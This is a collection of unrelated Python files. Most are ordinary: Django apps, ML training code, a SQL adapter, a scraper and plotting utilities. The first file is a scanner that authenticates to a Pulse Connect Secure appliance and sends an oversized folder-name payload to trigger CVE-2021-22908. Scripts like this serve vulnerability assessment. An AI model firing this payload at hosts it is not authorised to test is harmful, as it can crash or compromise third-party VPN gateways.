if(attr[0] == 'id'):
if(attr[1] == 'sn-preauth-text_2'):
self.foundelement = True
def handle_data(self, data):
if self.foundelement:
self.data = data
self.foundelement = False
def get_realm(host, defaulturi):
realm = None
print('Getting default realm for %s...' % host)
url = 'https://%s%s' % (host,defaulturi)
res = None
try:
res = requests.get(url, verify=False, timeout=10)
except requests.exceptions.ConnectionError:
print('Error retrieving %s' % url)
if res:
if res.status_code == 200:
html = str(res.content)
if 'sn-preauth-text_2' in html:
print('Preauth required...')
parser = preauthfinder()
parser.feed(html)
preauthtext = parser.data
values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
if res.content:
parser = formvaluefinder('realm')
parser.feed(str(res.content))
realm = parser.data
else:
print('Error retrieving login page')
else:
parser = formvaluefinder('realm')
parser.feed(html)
realm = parser.data
return realm
def get_dsid(host, defaulturi, realm, user, password):
dsid = None
loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
url = 'https://%s%s' % (host,loginuri)
values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
if 'confirm' in res.headers['location']:
# Redirect to "user-confirm" that they still want to log in, despite already
# having an active session
print('User session is already active! Proceeding...')
res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
parser = formvaluefinder('FormDataStr')
parser.feed(str(res.content))
formdata = parser.data
values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
elif 'cred' in res.headers['location']:
# This is a pulse that requires 2FA
res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
for cookie in res.cookies:
if cookie.name == 'id':
key = cookie.value
password2 = input('MFA code: ')
values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
cookies = {'id': key, 'DSSigninNotif': '1'}
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
if 'confirm' in res.headers['location']:
# Redirect to "user-confirm" that they still want to log in, despite already
# having an active session
print('User session is already active! Proceeding...')
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
parser = formvaluefinder('FormDataStr')
parser.feed(str(res.content))
formdata = parser.data
values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
else:
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
elif 'failed' in res.headers['location']:
print('Login failed!')
else:
# Login accepted
for cookie in res.cookies:
if cookie.name == 'DSID':
dsid = cookie.value
return dsid
def get_xsauth(host, dsid):
xsauth = None
url = 'https://%s/dana/home/index.cgi' % host
cookies = {'DSID':dsid}
res = requests.get(url, verify=False, cookies=cookies, timeout=10)
if 'xsauth' in str(res.content):
parser = formvaluefinder('xsauth')
parser.feed(str(res.content))
xsauth = parser.data
else:
print('Cannot find xsauth string for provided DSID: %s' % dsid)
return xsauth
def trigger_vul(host, dsid, xsauth):
url = 'https://%s/dana/fb/smb/wnf.cgi' % host
values = {
't': 's',
'v': '%s,,' % ('A' * 1800),
'dir': 'tmp',
'si': None,
'ri': None,
'pi': None,
'confirm': 'yes',
'folder': 'tmp',
'acttype': 'create',
'xsauth': xsauth,
'create': 'Create Folder',
}
cookies = {'DSID': dsid}
try:
res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
status = res.status_code
if 'DSIDFormDataStr' in str(res.content):
# We got page asking to confirm our action
print('xsauth value was not accepted')
else:
if status == 200 and 'Error FB-8' in str(res.content):
print('HTTP %s. Windows File Access Policies prevents exploitation.' % status)
elif status == 200:
print('HTTP %s. Not vulnerable.' % status)
elif status == 403:
print('HTTP %s. XML workaround applied.' % status)
elif status == 500:
print('HTTP %s. %s is vulnerable to CVE-2021-22908!' % (status, host))
elif status == 302:
                print('HTTP %s. Are you sure your DSID is valid?' % status)
else:
print('HTTP %s. Not sure how to interpret this result.' % status)
except requests.exceptions.ReadTimeout:
print('No response from server. Try again...')
def get_default(host):
url = 'https://%s' % host
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    location = None
    try:
        location = res.headers['location']
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except KeyError:
        pass
return location
def check_xml(host):
url = 'https://%s/dana/meeting' % host
#print('Checking status of %s ...' % url)
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
if res.status_code == 403:
print('Workaround-2104 appears to be installed')
else:
print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')
url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
#print('Checking status of %s ...' % url)
res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
if res.status_code == 403:
print('Workaround-2105 appears to be installed')
else:
print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')
host = args.host
if args.noauth:
check_xml(host)
else:
defaulturi = get_default(host)
if defaulturi:
if not args.realm:
realm = get_realm(host, defaulturi)
else:
realm = args.realm
if realm:
print('Realm: %s' % realm)
if not args.user and not args.dsid:
user = input('User: ')
else:
user = args.user
if not args.password and not args.dsid:
password = getpass.getpass()
else:
password = args.password
if not args.dsid:
dsid = get_dsid(host, defaulturi, realm, user, password)
print('DSID: %s' % dsid)
else:
dsid = args.dsid
if dsid:
if not args.xsauth:
xsauth = get_xsauth(host, dsid)
print('xsauth: %s' % xsauth)
else:
xsauth = args.xsauth
if xsauth:
trigger_vul(host, dsid, xsauth)
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import io
import tarfile
from ..exceptions import NodeNotFoundError
from ..utils import get_container
logger = logging.getLogger(__name__)
def main(args):
if args.source == args.destination:
raise ValueError('Cannot have the same source and destination')
if ':' in args.source and ':' in args.destination:
src_container = _find_container(args.source.split(':')[0])
dest_container = _find_container(args.destination.split(':')[0])
src_path = args.source.split(':')[1]
dest_path = args.destination.split(':')[1]
tarstream = io.BytesIO()
for chunk in src_container.get_archive(path=src_path)[0]:
tarstream.write(chunk)
tarstream.seek(0)
dest_container.put_archive(path=dest_path, data=tarstream)
elif ':' in args.source:
src_container = _find_container(args.source.split(':')[0])
src_path = args.source.split(':')[1]
tarstream = io.BytesIO()
for chunk in src_container.get_archive(path=src_path)[0]:
tarstream.write(chunk)
tarstream.seek(0)
with tarfile.open(fileobj=tarstream) as tarfile_:
tarfile_.extractall(path=args.destination)
elif ':' in args.destination:
dest_container = _find_container(args.destination.split(':')[0])
dest_path = args.destination.split(':')[1]
data = io.BytesIO()
with tarfile.open(fileobj=data, mode='w') as tarfile_:
tarfile_.add(args.source, arcname=args.source.split('/')[-1])
data.seek(0)
dest_container.put_archive(path=dest_path, data=data)
else:
raise ValueError('Source node FQDN or Destination node FQDN required')
def _find_container(node):
container = get_container(hostname=node)
if not container:
raise NodeNotFoundError(node)
return container
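# Hypothetical, illustration-only usage sketch: `args` is expected to carry `source`
# and `destination` strings, where a "<node>:<path>" form names a container resolved
# through get_container(). The hostname and paths below are made up, and a reachable
# Docker daemon is assumed.
def _copy_usage_sketch():
    from argparse import Namespace
    main(Namespace(source='node1.example.com:/etc/hosts', destination='./hosts'))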
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
# Create your views here.
def home(request):
template_name = 'home.html'
return render(request, template_name)
def contato(request):
template_name = 'contato.html'
return render(request, template_name)
def about(request):
template_name = 'about.html'
return render(request, template_name)
|
from unittest.runner import TextTestResult
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
# Create your models here.
class Neighborhood(models.Model):
name = models.CharField(max_length=30)
location = models.CharField(max_length=50)
neighborhood_desc=models.TextField()
occupants_count=models.IntegerField(default=0)
health_tell = models.IntegerField(null=True, blank=True)
police_number = models.IntegerField(null=True, blank=True)
def __str__(self):
return self.name
def save_neighborhood(self):
self.save()
def delete_neighborhood(self):
self.delete()
@classmethod
def find_neighborhood(cls, name):
        return cls.objects.filter(name__icontains=name)
@classmethod
def update_neighborhood(cls, id, name):
update = cls.objects.filter(id=id).update(name=name)
return update
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile', null=True)
name = models.CharField(max_length=50)
profile_pic = models.ImageField(upload_to='profile_photos/')
email = models.EmailField()
neighborhood = models.ForeignKey(Neighborhood,related_name='occupants', on_delete=models.CASCADE,null=True)
def __str__(self):
return self.name
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, created=False, **kwargs):
instance.profile.save()
def save_user(self):
self.save()
def delete_user(self):
self.delete()
class Business(models.Model):
name=models.CharField(max_length=50)
business_desc=models.TextField()
profile=models.ForeignKey(Profile,on_delete=models.CASCADE,related_name='business_user',null=True)
business_email=models.EmailField()
neighborhood=models.ForeignKey(Neighborhood,on_delete=models.CASCADE)
def __str__(self):
return self.name
def save_business(self):
self.save()
def delete_business(self):
self.delete()
@classmethod
def find_business(cls, name):
        return cls.objects.filter(name__icontains=name)
@classmethod
def update_business(cls, id, name):
update = cls.objects.filter(id=id).update(name=name)
return update
class Post(models.Model):
post_name=models.CharField(max_length=100)
post_content=models.TextField()
pub_date=models.DateTimeField(auto_now_add=True)
profile=models.ForeignKey(Profile,on_delete=models.CASCADE, related_name='post',null=True)
neighborhood=models.ForeignKey(Neighborhood,on_delete=models.CASCADE,related_name='post_hood',null=True)
def __str__(self):
return self.post_name
|
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import Pipeline
from sklearn.datasets import fetch_20newsgroups
from sklearn import metrics
import joblib
from api import CAT
if __name__ == "__main__":
# Just grab the training set:
newsgroups_train = fetch_20newsgroups(
subset="train", categories=CAT, shuffle=True, random_state=42
)
# Create our processing pipeline and train it
text_clf = Pipeline(
[("tfidf", TfidfVectorizer()), ("clf", MultinomialNB(alpha=0.01))]
)
text_clf.fit(newsgroups_train.data, newsgroups_train.target)
# Now we save it to a pickle
joblib.dump(text_clf, "pipeline.pkl")
# To test:
newsgroups_test = fetch_20newsgroups(subset="test", categories=CAT)
pred = text_clf.predict(newsgroups_test.data)
f1 = metrics.f1_score(newsgroups_test.target, pred, average="macro")
print("F1 score: {:.03f}".format(f1))
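# Hypothetical, illustration-only sketch of reusing the saved pipeline: joblib
# restores the fitted TF-IDF + MultinomialNB pipeline, and predict() returns
# integer class indices in the fitted label space.
def _load_and_predict_sketch():
    clf = joblib.load("pipeline.pkl")
    return clf.predict(["The rocket launch was delayed by bad weather."])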
|
# -*- coding: utf-8 -*-
import pytest
from tennis import TennisGame3
from tennis_unittest import test_cases, play_game
class TestTennis:
@pytest.mark.parametrize('p1Points p2Points score p1Name p2Name'.split(), test_cases)
def test_get_score_game3(self, p1Points, p2Points, score, p1Name, p2Name):
game = play_game(TennisGame3, p1Points, p2Points, p1Name, p2Name)
assert score == game.score()
|
from typing import List
from injector import inject
from pandas import DataFrame
from pdip.integrator.connection.base import ConnectionTargetAdapter
from pdip.integrator.connection.types.sql.base import SqlProvider
from pdip.integrator.integration.domain.base import IntegrationBase
class SqlTargetAdapter(ConnectionTargetAdapter):
@inject
def __init__(self,
provider: SqlProvider,
):
self.provider = provider
def clear_data(self, integration: IntegrationBase) -> int:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
truncate_affected_rowcount = target_context.truncate_table(schema=integration.TargetConnections.Sql.Schema,
table=integration.TargetConnections.Sql.ObjectName)
return truncate_affected_rowcount
def prepare_insert_row(self, data, columns):
insert_rows = []
for extracted_data in data:
row = []
for column in columns:
column_data = extracted_data[column]
row.append(column_data)
insert_rows.append(tuple(row))
return insert_rows
def prepare_data(self, integration: IntegrationBase, source_data: any) -> List[any]:
columns = integration.SourceConnections.Columns
if columns is not None:
source_columns = [(column.Name) for column in columns]
elif columns is None:
source_columns = source_data[0].keys()
if isinstance(source_data, DataFrame):
data = source_data[source_columns]
prepared_data = data.values.tolist()
else:
prepared_data = self.prepare_insert_row(data=source_data, columns=source_columns)
return prepared_data
def prepare_target_query(self, integration: IntegrationBase, source_column_count: int) -> str:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
source_columns = integration.SourceConnections.Columns
target_columns = integration.TargetConnections.Columns
if integration.TargetConnections.Sql.Query is not None:
if source_columns is not None and len(source_columns) > 0:
column_rows = [(column.Name) for column in source_columns]
prepared_target_query = target_context.prepare_target_query(
column_rows=column_rows,
query=integration.TargetConnections.Sql.Query
)
else:
schema = integration.TargetConnections.Sql.Schema
table = integration.TargetConnections.Sql.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Schema and table required. {schema}.{table}")
indexer_array = []
indexer = target_context.dialect.get_query_indexer()
for index in range(source_column_count):
column_indexer = indexer.format(index=index)
indexer_array.append(column_indexer)
values_query = ','.join(indexer_array)
prepared_target_query = target_context.dialect.get_insert_values_query(
values_query=values_query,
schema=schema,
table=table
)
else:
if source_columns is not None and len(source_columns) > 0:
schema = integration.TargetConnections.Sql.Schema
table = integration.TargetConnections.Sql.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Schema and table required. {schema}.{table}")
indexer_array = []
target_column_rows = [column.Name for column in target_columns]
columns_query = ",".join(target_column_rows)
indexer = target_context.dialect.get_query_indexer()
for index in range(source_column_count):
column_indexer = indexer.format(index=index)
indexer_array.append(column_indexer)
values_query = ','.join(indexer_array)
prepared_target_query = target_context.dialect.get_insert_query(
columns_query=columns_query,
values_query=values_query,
schema=schema,
table=table
)
else:
schema = integration.TargetConnections.Sql.Schema
table = integration.TargetConnections.Sql.ObjectName
if schema is None or schema == '' or table is None or table == '':
raise Exception(f"Schema and table required. {schema}.{table}")
indexer_array = []
indexer = target_context.dialect.get_query_indexer()
for index in range(source_column_count):
column_indexer = indexer.format(index=index)
indexer_array.append(column_indexer)
values_query = ','.join(indexer_array)
prepared_target_query = target_context.dialect.get_insert_values_query(
values_query=values_query,
schema=schema,
table=table
)
return prepared_target_query
def write_target_data(self, integration: IntegrationBase, prepared_data: List[any]) -> int:
if prepared_data is not None and len(prepared_data) > 0:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
prepared_target_query = self.prepare_target_query(integration=integration,
source_column_count=len(prepared_data[0]))
affected_row_count = target_context.execute_many(query=prepared_target_query, data=prepared_data)
return affected_row_count
else:
return 0
def do_target_operation(self, integration: IntegrationBase) -> int:
target_context = self.provider.get_context_by_config(
config=integration.TargetConnections.Sql.Connection)
affected_rowcount = target_context.execute(query=integration.TargetConnections.Sql.Query)
return affected_rowcount
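# Hypothetical, illustration-only sketch of the row shaping performed by
# SqlTargetAdapter.prepare_insert_row: dict-like source rows are flattened into
# tuples ordered by the selected column names, ready for execute_many().
def _prepare_insert_row_sketch():
    rows = [{'id': 1, 'name': 'a'}, {'id': 2, 'name': 'b'}]
    columns = ['id', 'name']
    return [tuple(row[c] for c in columns) for row in rows]  # [(1, 'a'), (2, 'b')]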
|
#!/usr/bin/env python3.5
import numpy as np
import cv2
from .data import SCALES
class cv2Window( ):
def __init__( self, name, type = cv2.WINDOW_AUTOSIZE ):
self.name = name
self.title = name
self.type = type
def __enter__( self ):
cv2.namedWindow( self.name, self.type )
return self
def __exit__( self, *args ):
cv2.destroyWindow( self.name )
def getTitle(self):
return self.title
def setTitle(self, new_title):
self.title = new_title
cv2.setWindowTitle(self.name, self.title)
def isKeyDown(self, key):
return cv2.waitKey( 1 ) & 0xFF == ord(key)
def getKey(self):
return chr(cv2.waitKey( 1 ) & 0xFF)
def show( self, mat ):
cv2.imshow( self.name, mat )
def visualizer(images, callback = None, win_title = 'Visualizer'):
quit = False
length = len(images)
i = 0
img = None
with cv2Window( win_title ) as window:
while not quit:
if type(images[i]) is np.ndarray:
img = images[i]
elif type(images[i]) is str:
img = cv2.imread(images[i])
if callback:
callback(img)
window.show(img)
key = window.getKey()
while key not in 'npq':
key = window.getKey()
if key == 'n':
i = ( i + 1 ) % length
elif key == 'p':
i = i - 1 if i > 0 else length-1
elif key == 'q':
quit = True
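# Hypothetical, illustration-only usage sketch: the file names are made up. 'n' and
# 'p' step forward/backward through the images, 'q' quits, and the optional callback
# can annotate each frame before it is shown.
def _visualizer_usage_sketch():
    def draw_label(img):
        cv2.putText(img, 'preview', (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2)
    visualizer(['frame_000.png', 'frame_001.png'], callback=draw_label)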
|
"""
===================================================
A class for VCF format
===================================================
"""
import re
class VCFHeader:
def __init__(self, hInfo = None):
self.header = {}
if hInfo and (type(hInfo) is not dict): raise ValueError ('The data type should be "dict" in class of "VCFHeader", but found %s' % str(type(hInfo)))
if hInfo: self.header = hInfo
def Add(self, mark, id, num, type, description):
key = '##%s=<ID=%s' % (mark, id)
val = '##%s=<ID=%s,Number=%d,Type=%s,Description="%s">' % (mark, id, num, type, description)
self.header[key] = val
return self
def Record(self, headline):
if re.search (r'^##fileformat', headline): tag = '###'
elif re.search (r'^#CHROM' , headline): tag = '#CHROM'
else: tag = headline.split(',')[0]
self.header[tag] = headline
class VCFInfo:
def __init__(self, info= None):
self.info = {}
if info and (type(info) is not dict): raise ValueError ('The data type should be "dict" in class of "VCFInfo", but found %s' % str(type(info)))
if info: self.info = info
def Add(self, key, context):
self.info[key] = context
return self
class VCFContext:
def __init__(self):
        self.chrom = None
        self.pos = None
        self.Id = None
        self.ref = None
        self.alt = None
        self.qual = None
        self.filters = None
        self.info = None
        self.formats = None
        self.sample = []
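# Hypothetical, illustration-only usage sketch of VCFHeader.Add: it stores a standard
# "##INFO=<...>" style header line keyed by its mark and ID.
def _vcf_header_usage_sketch():
    header = VCFHeader()
    header.Add('INFO', 'DP', 1, 'Integer', 'Total read depth')
    # -> '##INFO=<ID=DP,Number=1,Type=Integer,Description="Total read depth">'
    return header.header['##INFO=<ID=DP']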
|
"""
This module provides the molior BuildOrder
relation table.
"""
from sqlalchemy import Column, Integer, ForeignKey, Table, UniqueConstraint
from .database import Base
BuildOrder = Table( # pylint: disable=invalid-name
"buildorder",
Base.metadata,
Column("build_id", Integer, ForeignKey("build.id")),
Column("sourcerepository", Integer, ForeignKey("sourcerepository.id")),
Column("dependency", Integer, ForeignKey("sourcerepository.id")),
UniqueConstraint("sourcerepository", "dependency", name="unique_buildorder"),
)
|
"""Tests for hello function."""
import pytest
def test_pythoncms():
assert 1 == 1
|
from bs4 import BeautifulSoup
from .extracter import HTMLExtracter
import streamlit as st
from transformers import pipeline
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
class Scraper:
def __init__(self):
self.base_url = 'https://google.com/search'
async def __extract_html(self, crypto_name, page_limit):
params = {
'q': 'site:coinmarketcap.com %s' % crypto_name,
'hl': 'ru-RU',
'source': 'lnms',
'tbm': 'nws',
'num': page_limit
}
extracter = HTMLExtracter(self.base_url, params)
return await extracter.extract()
def __scrap_urls(self, div):
urls = div.find_all('a', {'class': 'WlydOe'})
return [url['href'] for url in urls]
def __scrap_headings(self, div):
headings = div.find_all('div', {'role': 'heading'})
return [heading.text for heading in headings]
def __scrap_paragraphs(self, div):
summarizer = pipeline("summarization")
results = div.findAll('div', class_='sc-16r8icm-0 jKrmxw container')
text = [result.text for result in results]
ARTICLE = ' '.join(text)
ARTICLE = ARTICLE.replace('.', '.<eos>')
ARTICLE = ARTICLE.replace('?', '.<eos>')
ARTICLE = ARTICLE.replace('!', '.<eos>')
sentences = ARTICLE.split('<eos>')
max_chunk = 500
current_chunk = 0
chunks = []
for sentence in sentences:
if len(chunks) == current_chunk + 1:
if (len(chunks[current_chunk])) + len(sentence.split(' ')) <= max_chunk:
chunks[current_chunk].extend(sentence.split(' '))
else:
current_chunk += 1
chunks.append(sentence.split(' '))
else:
print(current_chunk)
chunks.append(sentence.split(' '))
for chunk_id in range(len(chunks)):
chunks[chunk_id] = ' '.join(chunks[chunk_id])
        res = summarizer(chunks, max_length=120, min_length=30, do_sample=False)
        # paragraphs = div.find_all('div', {'class': 'GI74Re nDgy9d'})
        return [summ['summary_text'] for summ in res]
async def scrap(self, crypto_name, page_limit):
html = await self.__extract_html(crypto_name, page_limit)
soup = BeautifulSoup(html, 'html.parser')
raw_news = soup.find('div', {'id': 'rso'})
if not raw_news:
return []
urls = self.__scrap_urls(raw_news)
headings = self.__scrap_headings(raw_news)
paragraphs = self.__scrap_paragraphs(raw_news)
scrapped_news = []
        for index in range(min(page_limit, len(urls), len(headings), len(paragraphs))):
url = urls[index]
heading = headings[index]
paragraph = paragraphs[index]
scrapped_news.append({
'url': url,
'heading': heading,
'paragraph': paragraph
})
return scrapped_news
|
#!/usr/bin/env python
# CNEscualos (c) Baltasar 2016-19 MIT License <baltasarq@gmail.com>
import time
import logging
import webapp2
from model.member import Member
from model.competition import Competition
class DeleteTestCompetitionHandler(webapp2.RequestHandler):
def get(self):
# Check if the user is logged in
usr = Member.current()
if not usr or not usr.is_admin():
Member.show_error_unrecognized_usr(self)
return
try:
# Retrieve competition
competition = Competition.retrieve_competition(self)
# Retrieve test uid
str_test_uid = self.request.GET.get("test_id")
test_uid = 0
if str_test_uid:
try:
test_uid = int(str_test_uid)
except ValueError:
error_msg = "Deleting test: converting test uid: '" + str_test_uid + "'"
logging.error(error_msg)
return self.redirect("/error?msg=" + error_msg)
competition.delete_test_with_uid(test_uid)
competition.put()
time.sleep(1)
return self.redirect("/competition/modify?id=" + competition.key.urlsafe())
else:
return self.redirect("/error?msg=Not enough data deleting test in competition.")
except Exception as e:
logging.error("Deleting test in competition", str(e))
return self.redirect("/error?msg=Deleting test in competition: " + str(e))
app = webapp2.WSGIApplication([
("/competition/test/delete", DeleteTestCompetitionHandler),
], debug=True)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: hello.proto
# plugin: python-betterproto
from dataclasses import dataclass
import betterproto
@dataclass
class Greeting(betterproto.Message):
"""Greeting represents a message you can tell a user."""
message: str = betterproto.string_field(1)
|
import typing
import datetime
import tensorflow as tf
from model_logging import get_logger
from training_loop import k_to_true_ghi
class MainModel(tf.keras.Model):
TRAINING_REQUIRED = True
def __init__(
self,
stations: typing.Dict[typing.AnyStr, typing.Tuple[float, float, float]],
target_time_offsets: typing.List[datetime.timedelta],
config: typing.Dict[typing.AnyStr, typing.Any],
return_ghi_only=False
):
"""
Args:
stations: a map of station names of interest paired with their coordinates (latitude, longitude, elevation)
target_time_offsets: the list of timedeltas to predict GHIs for (by definition: [T=0, T+1h, T+3h, T+6h]).
config: configuration dictionary holding any extra parameters that might be required by the user. These
parameters are loaded automatically if the user provided a JSON file in their submission. Submitting
such a JSON file is completely optional, and this argument can be ignored if not needed.
"""
super(MainModel, self).__init__()
self.stations = stations
self.target_time_offsets = target_time_offsets
self.config = config
self.return_ghi_only = return_ghi_only
self.max_k_ghi = config["max_k_ghi"]
self.initialize()
def initialize(self):
self.logger = get_logger()
self.logger.debug("Model start")
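        # Architecture sketch: a single Conv3D collapses the input time dimension,
        # followed by stacked 2D conv + batch-norm blocks with max pooling, a
        # flatten, two dense layers, and one output unit per target time offset.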
nb_channels = self.config["nb_channels"]
image_size_m = self.config["image_size_m"]
image_size_n = self.config["image_size_n"]
input_seq_length = self.config["input_seq_length"]
self.conv3d_1 = tf.keras.layers.Conv3D(
filters=self.config["nb_feature_maps"],
kernel_size=(input_seq_length, 7, 7),
input_shape=(input_seq_length, image_size_m, image_size_n, nb_channels),
padding="valid",
strides=(1, 1, 1),
activation=None
)
self.bn_1 = tf.keras.layers.BatchNormalization()
self.pool_1 = tf.keras.layers.MaxPool2D(
pool_size=(2, 2),
strides=(2, 2)
)
self.conv2d_1 = tf.keras.layers.Conv2D(
filters=(2 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_2 = tf.keras.layers.BatchNormalization()
self.conv2d_2 = tf.keras.layers.Conv2D(
filters=(2 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_3 = tf.keras.layers.BatchNormalization()
self.pool_2 = tf.keras.layers.MaxPool2D(
pool_size=(2, 2),
strides=(2, 2)
)
self.conv2d_3 = tf.keras.layers.Conv2D(
filters=(4 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_4 = tf.keras.layers.BatchNormalization()
self.conv2d_4 = tf.keras.layers.Conv2D(
filters=(4 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_5 = tf.keras.layers.BatchNormalization()
self.conv2d_5 = tf.keras.layers.Conv2D(
filters=(4 * self.config["nb_feature_maps"]),
kernel_size=(3, 3),
strides=(1, 1),
padding="same",
activation=None
)
self.bn_6 = tf.keras.layers.BatchNormalization()
self.pool_3 = tf.keras.layers.MaxPool2D(
pool_size=(2, 2),
strides=(2, 2)
)
self.flatten = tf.keras.layers.Flatten()
self.dense_1 = tf.keras.layers.Dense(
self.config["nb_dense_units"],
activation=None
)
self.bn_7 = tf.keras.layers.BatchNormalization()
self.dense_2 = tf.keras.layers.Dense(
self.config["nb_dense_units"],
activation=None
)
self.bn_8 = tf.keras.layers.BatchNormalization()
# Output layer
self.dense_3 = tf.keras.layers.Dense(
len(self.target_time_offsets),
activation=None
)
def call(self, inputs, training=False, use_image_data_only=False):
'''
Defines the forward pass through our model
inputs[0]: cropped images
inputs[1]: clearsky_GHIs
inputs[2]: true_GHIs
inputs[3]: night_flags
inputs[4]: station_id_onehot
inputs[5]: date_vector
'''
images = inputs[0]
clearsky_GHIs = inputs[1]
# Zero; We decided not to use onehot station Ids
station_id_onehot = tf.zeros(inputs[4].shape)
if use_image_data_only:
date_vector = tf.zeros(inputs[5].shape)
normalized_clearsky_GHIs = tf.zeros(inputs[1].shape)
else:
date_vector = inputs[5]
# Refer to report for mean/std choices
normalized_clearsky_GHIs = (clearsky_GHIs - 454.5) / 293.9
x = self.conv3d_1(images)
x = self.bn_1(x, training=training)
x = tf.nn.relu(x)
x = tf.squeeze(x, [1])
x = self.pool_1(x)
x = self.conv2d_1(x)
x = self.bn_2(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_2(x)
x = self.bn_3(x, training=training)
x = tf.nn.relu(x)
x = self.pool_2(x)
x = self.conv2d_3(x)
x = self.bn_4(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_4(x)
x = self.bn_5(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_5(x)
x = self.bn_6(x, training=training)
x = tf.nn.relu(x)
x = self.pool_3(x)
x = self.flatten(x)
x = tf.concat((x, station_id_onehot, normalized_clearsky_GHIs, date_vector), axis=1)
x = self.dense_1(x)
x = self.bn_7(x, training=training)
x = tf.nn.relu(x)
x = self.dense_2(x)
x = self.bn_8(x, training=training)
x = tf.nn.relu(x)
x = self.dense_3(x)
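        # Squash raw outputs to (0, 1) to obtain the factor k, then map k back to
        # GHI values using the clear-sky GHIs (k_to_true_ghi).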
k = tf.nn.sigmoid(x)
y = k_to_true_ghi(self.max_k_ghi, k, clearsky_GHIs)
if self.return_ghi_only:
return y
return k, y
|
"""Init of the risk matrix package."""
|
import os
def local():
with open('emails.txt','r') as local_database:
return local_database.readlines()
def file():
if os.path.exists('emails.txt'):
return local()
else:
open("myfile.txt", "x")
return local()
|
# coding=utf-8
# Copyright 2022 HyperBO Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils for plots related to hyperbo."""
import matplotlib.pyplot as plt
import numpy as np
COLORS = {
'Rand': '#1f77b4',
'STBO': '#7f7f7f',
'STBOH': '#2ca02c',
'MAF': '#ff7f0e',
'MIMO': '#8c564b',
'RFGP': '#e377c2',
'H* NLL': '#d62728',
'H* KL': '#6a3d9a',
'H* NLLEUC': '#bcbd22',
'H* NLLKL': '#17becf'
}
def plot_with_upper_lower(x,
line,
lower,
upper,
color='r',
ax=None,
**plot_kwargs):
"""Plot mean and standard deviation with inputs x."""
if ax is None:
plt.figure()
ax = plt.gca()
ax.fill_between(x, lower, upper, alpha=.1, color=color)
ax.plot(x, line, color=color, **plot_kwargs)
def plot_array_mean_std(array, color, ax=None, axis=0, **plot_kwargs):
"""Plot experiment results stored in array."""
mean, std = np.mean(array, axis=axis), np.std(array, axis=axis)
x = range(1, len(mean) + 1)
plot_with_upper_lower(x, mean, mean - std, mean + std, color, ax,
**plot_kwargs)
def plot_array_median_percentile(array,
color,
ax=None,
percentile=20,
**plot_kwargs):
"""Plot experiment results stored in array."""
lower, median, upper = np.percentile(
array, [percentile, 50, 100 - percentile], axis=0)
x = range(1, len(median) + 1)
